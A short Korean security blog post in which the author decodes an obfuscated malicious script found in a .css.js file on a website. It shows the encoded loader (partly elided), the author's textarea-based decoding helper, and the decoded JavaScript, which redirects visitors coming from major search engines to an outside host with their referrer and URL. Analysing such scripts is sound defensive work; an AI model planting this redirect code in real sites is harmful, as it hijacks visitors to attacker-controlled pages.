본문 바로가기

security/악성코드 유포

우연히 발견한 악성스크립트 !

원본 위치 : http://kjclsb.buy3d.co.kr/style.css.js


document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%[생략]68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631mbohvbhf[생략]%60vs%264C%261E%261B%264D0tdsjqu%264F1')


<html>

<head>

</head>

<body>

<textarea rows="200" cols = "100" id='df'></textarea>

<script language=javascript>

function dF(s)

 {

   var s1=unescape(s.substr(0,s.length-1));

   var t='';

   for(i=0;

   i<s1.length;

   i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));

document.getElementById('df').value = unescape(t);

}

 dF('&4Dtdsjqu&31mbohvbhf&4E[생략]8D&8D&310ebvn0/uftu&39x``us&3:&31&8D&8D&310hpphmf0/uftu&39x``us&3:&3:&31mpdbujpo/isfg&4E&31x``vs&4C&1E&1B&4D0tdsjqu&4F1');

</script>


디코딩!


<script language="JavaScript">

var w__tr=encodeURIComponent(document.referrer);

var w__hr=encodeURIComponent(location.href);

var w__ur="http://nayas.cafe24.com/?r=" + w__tr + "&refe=" + w__hr;

if(/naver/.test(w__tr) || /nate/.test(w__tr)  || /yahoo/.test(w__tr)  || /daum/.test(w__tr) || /google/.test(w__tr)) location.href= w__ur;

</script>


textarea 태그 이용하는 방법도 괜찮은거 같다! 다양한 방법을 연구해봐야겠다!!!!

몇번 안해봐서 꽤 걸린거 같은데 구글도 찾아보고 네이버도 찾아봐서 이렇게 나오니 뿌듯하다!

document.getElementById 이것이 나의 구세주!